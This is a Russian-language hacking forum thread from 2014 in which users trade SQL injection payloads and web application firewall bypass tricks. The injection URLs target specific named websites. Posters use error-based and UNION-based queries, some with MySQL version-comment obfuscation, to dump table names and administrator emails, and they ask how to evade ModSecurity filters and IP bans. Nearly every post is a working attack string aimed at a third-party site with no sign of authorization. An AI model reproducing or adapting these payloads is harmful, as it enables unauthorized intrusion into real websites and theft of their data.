ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.12.2014, 01:40
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
Провел на форуме:
70640
Репутация:
0
|
|
Сообщение от madam
madam said:
можно ещё вопросик
что я опять делаю не так
(SELECT COUNT(*),CONCAT((SELECT id FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает 16
а
(SELECT COUNT(*),CONCAT((SELECT email FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
возращает
Subquery returns more than 1 row
(((
Код:
Code:
(SELECT COUNT(*),CONCAT((SELECT mid(email,1,20) FROM administrators LIMIT 0,1 ),0x3a,FLOOR(RAND(0)*2) )x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
|
|
|
08.12.2014, 03:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
есть
Сообщение от None
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,con cat(0x3a,(select(version())))))='1
user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь?
Сообщение от None
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,con cat(0x3a,(select+mid(TAble_NaMe,1,31)+from+informa tion_schema.tables))))='1
PS много запросов не делайте часто, забанит |
|
|
|
08.12.2014, 23:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
8396
Репутация:
6
|
|
Сообщение от Br@!ns
Br@!ns said:
есть
user() фильтрует, как я понял "table_name" фильтрует, мб кто подскажет что нибудь?
PS много запросов не делайте часто, забанит
Код:
Code:
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),1,31))from(information_schema.tables)))))='1
http://fumfie.com/category/4-2/?sort=sellers&brand=0&page=3'or(ExtractValue(1,concat(0x3a,(select(mid(group_concat(/*!table_name*/),32,63))from(information_schema.tables)))))='1
|
|
|
|
09.12.2014, 04:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
как обойти такую WAF?
Код HTML:
HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+
Код HTML:
HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+
фильтрует комбинацию union+select и concat |
|
|
|
09.12.2014, 04:49
|
|
Guest
Сообщений: n/a
Провел на форуме:
114076
Репутация:
54
|
|
Сообщение от Br@!ns
Br@!ns said:
как обойти такую WAF?
Код HTML:
HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+order+by+5+--+
Код HTML:
HTML:
https://www.swallowtailfarms.com/store/?cat_id=43'+union(select(1,2,3,4))+--+
фильтрует комбинацию union+select и concat Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.
Код:
Code:
/store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
|
|
|
|
09.12.2014, 05:17
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Сообщение от madhatter
madhatter said:
Старая версия модсесурити. В скрипте два запроса подряд с разным количеством полей, 4 и 7.
Код:
Code:
/store/?cat_id=43'/*!50000union*/ /*!50000select*/ 1,2,3,4,5,6,7-- x
а как дальше вот это обойти можно?
Код HTML:
HTML:
https://www.swallowtailfarms.com//store/?cat_id=43'/*!50000union*/+/*!50000select*/+1,2,table_name,4,5,version(),7+from/**/information_schema.tables--%20
|
|
|
|
09.12.2014, 08:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
докручивай через post запрос, там error-based.
 |
|
|
|
14.12.2014, 11:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
Не получается обойти фильтр на слово information_schema.
/*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?
http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+
сайт банит ip при неудачных попытках
|
|
|
|
14.12.2014, 16:01
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Br@!ns
Br@!ns said:
Не получается обойти фильтр на слово information_schema.
/*!information_schema*/ , dgsdginformation_schemasdgsdg, частичное и полное url кодирование не помогают, какие еще варианты есть?
http://www.globekey.com/weblink/index.php?hid=USM5829k'+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7,8,9,table_name,11,12,13,14,15,16+--+
сайт банит ip при неудачных попытках
Щас выложат и завтра уже залепят новый фильтр. А по сути реально способов обойти mod security и подобные WAF не так уж и много и почти все уже в фильтрах.
|
|
|
|
14.12.2014, 20:42
|
|
Guest
Сообщений: n/a
Провел на форуме:
179197
Репутация:
25
|
|
не получается обойти waf с фильтром на union select, selecr from. какие решениея есть? мб етсь возможность составить запрос, гду from будет впереди select, или как нибудь по-другому??
http://blogger.saibaba.us/cart.php?shopping_cart=yes&add2cart=1029+||@:=10+g roup+by+left(version(),@:=~@)having+min(0)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
